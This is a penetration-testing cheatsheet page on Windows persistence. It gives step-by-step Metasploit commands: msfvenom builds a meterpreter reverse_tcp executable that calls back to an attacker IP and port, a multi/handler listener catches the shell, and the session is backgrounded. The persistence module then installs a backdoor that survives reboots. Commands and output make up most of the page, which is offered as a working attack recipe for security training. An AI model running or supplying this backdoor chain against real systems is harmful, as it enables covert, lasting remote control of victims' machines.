> For the complete documentation index, see [llms.txt](https://lanzt.gitbook.io/cheatsheet-pentest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lanzt.gitbook.io/cheatsheet-pentest/windows-things/active-directory-methodology/post-explotation/persistence.md).

# Persistence

## Metasploit

### Use msfvenom to create the payload

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exe
```

* Upload file to victim machine
* Start msfconsole
* Execute:

```bash
msf > use exploit/multi/handler
```

```bash
msf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
```

### Run listener

```bash
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461
```

* Execute lashe.exe (our payload) in victim
* We obtain the shell:

<figure><img src="/files/SoycLeqlpPaambWwSKfT" alt=""><figcaption></figcaption></figure>

### Background session

```bash
meterpreter > background
[*] Backgrounding session 1...
```

### Use persistence module

```bash
msf exploit(multi/handler) > use exploit/windows/local/persistence
msf exploit(windows/local/persistence) >
```

### Set background session

```bash
msf exploit(windows/local/persistence) > set session 1
```

### Run persistence

<figure><img src="/files/NCcb0PR4j0AQBTs3xchq" alt=""><figcaption></figcaption></figure>

> If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to `windows/meterpreter/reverse_tcp` allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.
